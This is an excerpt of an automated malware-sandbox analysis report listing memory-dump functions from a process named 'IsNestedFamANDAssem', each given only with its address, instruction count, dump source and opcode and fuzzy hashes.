                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7d6a326d91a214abd43f5d8a97b5a3cc4853d602aee3596da58fe57845306707
                                                                  • Instruction ID: 2826381216b313713fbbc25d7bf049f9cf67383e724254fc3e41fbdd0735f921
                                                                  • Opcode Fuzzy Hash: 7d6a326d91a214abd43f5d8a97b5a3cc4853d602aee3596da58fe57845306707
                                                                  • Instruction Fuzzy Hash: EC118C78914228CFEF749F78D888B99BBB5BB49314F2086D9D44DA2609CF765AC4CF00
                                                                  Function 05DB7538 Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e382f49a5705aaf13d053693643292267496bb64f7c00ed3d92fd347b82d66d7
                                                                  • Instruction ID: 0a4f3331ed63112c66f044c22c1f7714f51343990fffdb5031ba8b8c8eb2c47d
                                                                  • Opcode Fuzzy Hash: e382f49a5705aaf13d053693643292267496bb64f7c00ed3d92fd347b82d66d7
                                                                  • Instruction Fuzzy Hash: 5CF05874808208EFD721DFA4C8405ECBBB1EB4A215F1082AAD89963341C6368B02DB90
                                                                  Function 05DBB216 Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 26fde83930abab9d0dcb030e2545d4cf907cc89845ede154608d3e648550a70a
                                                                  • Instruction ID: 47856f69ee0979da04dc34d8ee01df63c73ebd9def500eb727df205e53070119
                                                                  • Opcode Fuzzy Hash: 26fde83930abab9d0dcb030e2545d4cf907cc89845ede154608d3e648550a70a
                                                                  • Instruction Fuzzy Hash: 3001D074A00228CFDBA4DF25D894ACDB7B2FB8A304F508199D58DAB354CB346E84CF80
                                                                  Function 05DB8170 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aec7a86819b282cf31f7af122cab1c901113bd0aa8758a210715f4036ac15f98
                                                                  • Instruction ID: a2428ddbbd08aca73dda5a1402d1d50715684a526522061b1dad2ee6a09fb2fb
                                                                  • Opcode Fuzzy Hash: aec7a86819b282cf31f7af122cab1c901113bd0aa8758a210715f4036ac15f98
                                                                  • Instruction Fuzzy Hash: 27F0E935006248EFD716CF54C8006D97F72EF09320F14858ADC8557197C6328D17D740
                                                                  Function 05DB8B59 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 553e6c0c51ec30af7977938f6ab504f05202785f450579881071e3bfea9ff2ca
                                                                  • Instruction ID: b6a1288c415255a7ce0836ee51c21223be499c41db94b5457e7f959a79fdf43b
                                                                  • Opcode Fuzzy Hash: 553e6c0c51ec30af7977938f6ab504f05202785f450579881071e3bfea9ff2ca
                                                                  • Instruction Fuzzy Hash: 5BF08234408208EFCB11DFA4DD059DCBF76FF49310F14859AEC8567251D7328A61EB45
                                                                  Function 06C43CC0 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4445967ea3ce97faeb281b8f48746929540bde8c7c18a6f20c29e7c3d88443ae
                                                                  • Instruction ID: c4eca6c41a347f94235f0b49c216f8ec54e0849b2453923275068014b378bcf2
                                                                  • Opcode Fuzzy Hash: 4445967ea3ce97faeb281b8f48746929540bde8c7c18a6f20c29e7c3d88443ae
                                                                  • Instruction Fuzzy Hash: 14F082B4E04208EFD750EFA5D44179DBBF5EB48201F1182E9DC49A7385E6355A04CF82
                                                                  Function 05DB7310 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b5fa3a6ba0bbe70550ea3653303446ab4edcb03b83ca7cfeb4d230ca43b3f49
                                                                  • Instruction ID: b0228ea31a1743724a5d92b5cb795133f6edff7fb78ac90e549e0aee877d8ba0
                                                                  • Opcode Fuzzy Hash: 7b5fa3a6ba0bbe70550ea3653303446ab4edcb03b83ca7cfeb4d230ca43b3f49
                                                                  • Instruction Fuzzy Hash: 2CF0303050D284DFC716CFB9C5910E8BFB1EF4621876849EED8D99A293DA325A07C741
                                                                  Function 06C43A10 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a38e6c4935f9add56dfb9f4ada869f8c52a3725c89444efa7b4b5e5dd8429c2c
                                                                  • Instruction ID: 70b5b132881331381fdf9f89b435485aef90515e62756d4bac5ad6e37cb1645a
                                                                  • Opcode Fuzzy Hash: a38e6c4935f9add56dfb9f4ada869f8c52a3725c89444efa7b4b5e5dd8429c2c
                                                                  • Instruction Fuzzy Hash: 61F05EB5D04144AFC750DFA9D9046ACBBB5AF8C301F10C1AAD85C93341D6354B11CF41
                                                                  Function 05DB1528 Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 35b0be61926574f0972b68768d6dfb952a7da38181aeec2bc8d920fd9b9ceb47
                                                                  • Instruction ID: 90abc8d547271c7eb47906d9f9462b3ea64f01522479e6bda4fd7acdb248a763
                                                                  • Opcode Fuzzy Hash: 35b0be61926574f0972b68768d6dfb952a7da38181aeec2bc8d920fd9b9ceb47
                                                                  • Instruction Fuzzy Hash: CEE02230A09204EFC700CBA4ED246EE7BBEAB86200F1081CBD80A97385D6718F16DB91
                                                                  Function 06C43238 Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 14713d5ae91436f3df2246de80c83acdb2059d44bce21870c9060527834caa0b
                                                                  • Instruction ID: 33478587ab44e40d82d439d86aae39e406e89b812699e3a791284e8393de43d4
                                                                  • Opcode Fuzzy Hash: 14713d5ae91436f3df2246de80c83acdb2059d44bce21870c9060527834caa0b
                                                                  • Instruction Fuzzy Hash: 21F0F874D04248AFCBA0DFA9C844AADBBF8AB8D211F14C19AEC58D3245D6359B11DF90
                                                                  Function 0134A569 Relevance: .0, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 331e1e54260bc41bdb15a10b303458f1c6dcc76f07b6d529209986d87aec6d65
                                                                  • Instruction ID: 3fd39818337012f98e5bd523e123ef66d7ad55ceb5f1a3a68a821ba353d5a90f
                                                                  • Opcode Fuzzy Hash: 331e1e54260bc41bdb15a10b303458f1c6dcc76f07b6d529209986d87aec6d65
                                                                  • Instruction Fuzzy Hash: 9601AF74A01228CFEB70CF18CA44BD9B7F0BB09314F1484D6958AA7644DB79AE819F51
                                                                  Function 05DB75D0 Relevance: .0, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 76888a355cf12fe33804b2a9c12f33d6af13dab66996e2f336e00aa7bf882636
                                                                  • Instruction ID: 68663b935125c6566b3fc71b2f6015ea8585ec7a57f3eb075b0cf697d792b718
                                                                  • Opcode Fuzzy Hash: 76888a355cf12fe33804b2a9c12f33d6af13dab66996e2f336e00aa7bf882636
                                                                  • Instruction Fuzzy Hash: 9CF0A730509380DFD762CF68C8456D47FE19F06114B1446DBCCC59B682C6354A42C741
                                                                  Function 05DB74F0 Relevance: .0, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 82ec782527c31f1973983c34bb3d40a3af289f396ea16290116c9117e6e0856f
                                                                  • Instruction ID: 136c9bb44a27f678c94469ca28128b60fe6400bdc5fb2cfc05d386cd4cb2359c
                                                                  • Opcode Fuzzy Hash: 82ec782527c31f1973983c34bb3d40a3af289f396ea16290116c9117e6e0856f
                                                                  • Instruction Fuzzy Hash: 57E0D8B28062099FD721AFB49D407EE7BF5DF47201B0407E7E445A3261E9310F549791
                                                                  Function 05DB2078 Relevance: .0, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 129a4ae6d817da93ae51a6061c7137b41e7cf418b8c367d78f3cbd3a3945e079
                                                                  • Instruction ID: 4a37b6ca7e9915b1056c3a9ad5407f2776cbd8aac31c684caa941576c8cb51e2
                                                                  • Opcode Fuzzy Hash: 129a4ae6d817da93ae51a6061c7137b41e7cf418b8c367d78f3cbd3a3945e079
                                                                  • Instruction Fuzzy Hash: 0BE0E539808204DFD710CFA5D8005A9BB76AB4A300F2081EBC84757341C6719982CB81
                                                                  Function 05DB6060 Relevance: .0, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d7721a4b4852944908f8420831d4de57018c890279d0bb1c7886309e4469123d
                                                                  • Instruction ID: b7cdae2760b89c2e2452c44e20e0705bfaa1d5f8a900746282cce2a4f5debd91
                                                                  • Opcode Fuzzy Hash: d7721a4b4852944908f8420831d4de57018c890279d0bb1c7886309e4469123d
                                                                  • Instruction Fuzzy Hash: 19E0223890A200EFC310CFA0ED446AA7F76AB46200F1482CAD84D57341C2318A42CBA0
                                                                  Function 05DB5019 Relevance: .0, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e4cec6516aaf2b17483607439f1b09f6d19611f86a4112d11826dd77fdb91a8
                                                                  • Instruction ID: 327a4053ccdb2b5dfb28f8aca927f4c2c296d9fff67a944d9c9b328e7ce10c64
                                                                  • Opcode Fuzzy Hash: 6e4cec6516aaf2b17483607439f1b09f6d19611f86a4112d11826dd77fdb91a8
                                                                  • Instruction Fuzzy Hash: 5FF0A030808244DFD720CFA9D8011D8BFB1AF4A214F2441EACCC6A6242E6364A41CB80
                                                                  Function 06C43CD0 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 21f7f854f0a7f21c2a86efffade246f33f359038cacef64893e08dd0b432b1aa
                                                                  • Instruction ID: 742bb2cd0e8b1fec2be1c168b2bb30d4fcd8b85e449b74bf60c2da511c3a64cb
                                                                  • Opcode Fuzzy Hash: 21f7f854f0a7f21c2a86efffade246f33f359038cacef64893e08dd0b432b1aa
                                                                  • Instruction Fuzzy Hash: 09F0ED74E00208EFDB50FFA9D4456ADBBF5FB88211F1082E9D859A7384E635AE44CF81
                                                                  Function 05DBC7C1 Relevance: .0, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b14422f01439a1f54cdeef02ad76a24fd9da207a12949f21e2d44e26c654fa0
                                                                  • Instruction ID: 1c66bbd1ee599f4c3266675bb55334fb9454bff5da3a633e4209e29392062550
                                                                  • Opcode Fuzzy Hash: 8b14422f01439a1f54cdeef02ad76a24fd9da207a12949f21e2d44e26c654fa0
                                                                  • Instruction Fuzzy Hash: B9E06D75959204DFD750DFB8C8443A8BFF6AB09201F2481DAC88AD7655D2728E01CB41
                                                                  Function 05DB8180 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 955c012d7cbaf02cf03e51e02b9004e9fc12e16a9af9f28115b1676fcc5cfedb
                                                                  • Instruction ID: 618d4c351c0f0eed56aad6a8987703cc31fe091e5245f0090dbb65c0e06ed604
                                                                  • Opcode Fuzzy Hash: 955c012d7cbaf02cf03e51e02b9004e9fc12e16a9af9f28115b1676fcc5cfedb
                                                                  • Instruction Fuzzy Hash: 4AE06538806208EBCB14CF90D8009ADBB7AFB48300F10C19AED4923254C7729A22EB80
                                                                  Function 05DBBDD0 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3067fdcca95cae33871b6b628e4a0de9cd694beef8dabbea4ee62904bfaa8224
                                                                  • Instruction ID: 32730d55841e1cc5133b0e77a16e7d48d291cb0170998dae3c6238d00212fc75
                                                                  • Opcode Fuzzy Hash: 3067fdcca95cae33871b6b628e4a0de9cd694beef8dabbea4ee62904bfaa8224
                                                                  • Instruction Fuzzy Hash: 39F01270901219CBEB24CF54C545BDABBF2FB08305F1180A6984EA73A4CB748E84CF10
                                                                  Function 05DBFF38 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6637edc2f282f3c1ef54cda22c9911c18dd833b1df21ef8e9c6f7f21ea4cb084
                                                                  • Instruction ID: b58f0862f7eb92af2522ee469c7bd5f05f818cbc67c24332afdc3a62fd6f9758
                                                                  • Opcode Fuzzy Hash: 6637edc2f282f3c1ef54cda22c9911c18dd833b1df21ef8e9c6f7f21ea4cb084
                                                                  • Instruction Fuzzy Hash: 41F0C934908208EFDB14DF94D844AACBBB6FB4D310F14C1AAEC5957354D6729A55DF80
                                                                  Function 05DBC961 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fff1ff641977f41fd0509d3a4677b90a603f0e3f690e53a0fd858a3c275088d1
                                                                  • Instruction ID: f3b053ecddc53bdb7b5ca71dacf5783c7b5a3c7a3ed2d0380bdac31f8f6f4bea
                                                                  • Opcode Fuzzy Hash: fff1ff641977f41fd0509d3a4677b90a603f0e3f690e53a0fd858a3c275088d1
                                                                  • Instruction Fuzzy Hash: D8E06D71D14104DFE760DFB8C9457ADBBB2AB0C202F2081AEC84DA3751D2328A12CB81
                                                                  Function 05DB8B68 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 955c012d7cbaf02cf03e51e02b9004e9fc12e16a9af9f28115b1676fcc5cfedb
                                                                  • Instruction ID: 3c71785002925c21a21e2d01971d0f73309dae721f20d23c0395c3126b21dc92
                                                                  • Opcode Fuzzy Hash: 955c012d7cbaf02cf03e51e02b9004e9fc12e16a9af9f28115b1676fcc5cfedb
                                                                  • Instruction Fuzzy Hash: DAE06538804208FBCB11CFA0D9009ADBB7AFB48311F14C19AEC4923254C7729A22EB84
                                                                  Function 05DBBA28 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7512fe14fcae5bea1fb3810b126ff7a6139585cc007b92ef08ce1afe8e149c63
                                                                  • Instruction ID: 883b4af1a1051e2f4aaf11cb061b43e9f1bea2e9926520668f8a23266411db76
                                                                  • Opcode Fuzzy Hash: 7512fe14fcae5bea1fb3810b126ff7a6139585cc007b92ef08ce1afe8e149c63
                                                                  • Instruction Fuzzy Hash: F2F03974C04208EFDB10CF94C800AACBFB6EB48300F10C19AEC5953344D6729A51DF80
                                                                  Function 07045DD8 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e2bb1b9e10849196eae403aeecde73320418352933225702ab13a272d2487b0f
                                                                  • Instruction ID: aab114b3bd10ac776267b19e33be0f455fda91b9d50e3c955e463f72970ec5d8
                                                                  • Opcode Fuzzy Hash: e2bb1b9e10849196eae403aeecde73320418352933225702ab13a272d2487b0f
                                                                  • Instruction Fuzzy Hash: C5E0C9B4D04208EFCB64DFA8D84469CBBF5EB48300F10C1AADC59A3344D6359A51DF80
                                                                  Function 0704A448 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e2bb1b9e10849196eae403aeecde73320418352933225702ab13a272d2487b0f
                                                                  • Instruction ID: 1fcd68fd55f50cad9ead4144f7f3315e49e2e3c6640dc9967de3650c2cd863a0
                                                                  • Opcode Fuzzy Hash: e2bb1b9e10849196eae403aeecde73320418352933225702ab13a272d2487b0f
                                                                  • Instruction Fuzzy Hash: 37E0C9B4E04208EFDB54DFA8D44469CBBF5EB89301F10C1AADC58A3344D6759A51DF80
                                                                  Function 05DB44B2 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1b1564805bb0e42a4466ef48e8a11845e8087c35851f3f95012cdc19152b544a
                                                                  • Instruction ID: 4e3a2be307befe587f03294ef88650ceb93295652515edcb8760502de6d32c8f
                                                                  • Opcode Fuzzy Hash: 1b1564805bb0e42a4466ef48e8a11845e8087c35851f3f95012cdc19152b544a
                                                                  • Instruction Fuzzy Hash: 34F0D474900228CFEB64DF69D941BA8B7F2FB49301F5084D6D15DA6245DB748EC1CF10
                                                                  Function 06C45A52 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a8b9ea02a9704b2d076d59f5c0df1fa5a4fbb256f5ba26c80c5a6bbbce09241
                                                                  • Instruction ID: 7239cd652ca093cf73c962ca013fc6790ea69f310bc3e186be9bf272819abb09
                                                                  • Opcode Fuzzy Hash: 4a8b9ea02a9704b2d076d59f5c0df1fa5a4fbb256f5ba26c80c5a6bbbce09241
                                                                  • Instruction Fuzzy Hash: 8EF0A9B4C04108EFD714DFA4C440AACBBB1AF48300F10C1EADC4413241DA328AA1CF80
                                                                  Function 06C4A995 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a1967c2b4895b3bafaf3a36611990b5a47e238822647f3cf62742fbc4b1860ee
                                                                  • Instruction ID: 0d2eae28a1d27d3d3ed613fd9092c5fa96234f9313f646a3b8af310a3810a87a
                                                                  • Opcode Fuzzy Hash: a1967c2b4895b3bafaf3a36611990b5a47e238822647f3cf62742fbc4b1860ee
                                                                  • Instruction Fuzzy Hash: F9F0A4B4D0122CCFEBA0DF18C894799B7B2EF45305F1454DAC449A3204DB355B948FA6
                                                                  Function 05DBB5BD Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59478ae1176f9a7bfe73918e4a9140b84dab882e00d593aa0a83bd4c1ba20872
                                                                  • Instruction ID: 199ae099113144ce26c357ca610ac7efa32f3071a5866dbe1568867fad1971ae
                                                                  • Opcode Fuzzy Hash: 59478ae1176f9a7bfe73918e4a9140b84dab882e00d593aa0a83bd4c1ba20872
                                                                  • Instruction Fuzzy Hash: F0F039B8808298CFC7A1CF70CC547DCBFB0EF0A304F1485DAD489AB295CA784A868F14
                                                                  Function 05DB8717 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01d3d99e1132004a82061ba50f0ba585345bf42250fc24ed8f2b699f2db8fa81
                                                                  • Instruction ID: fe5405693e10595d8ea4acb1d0224ebc6091e169d8df19e90807e1a5201ba66f
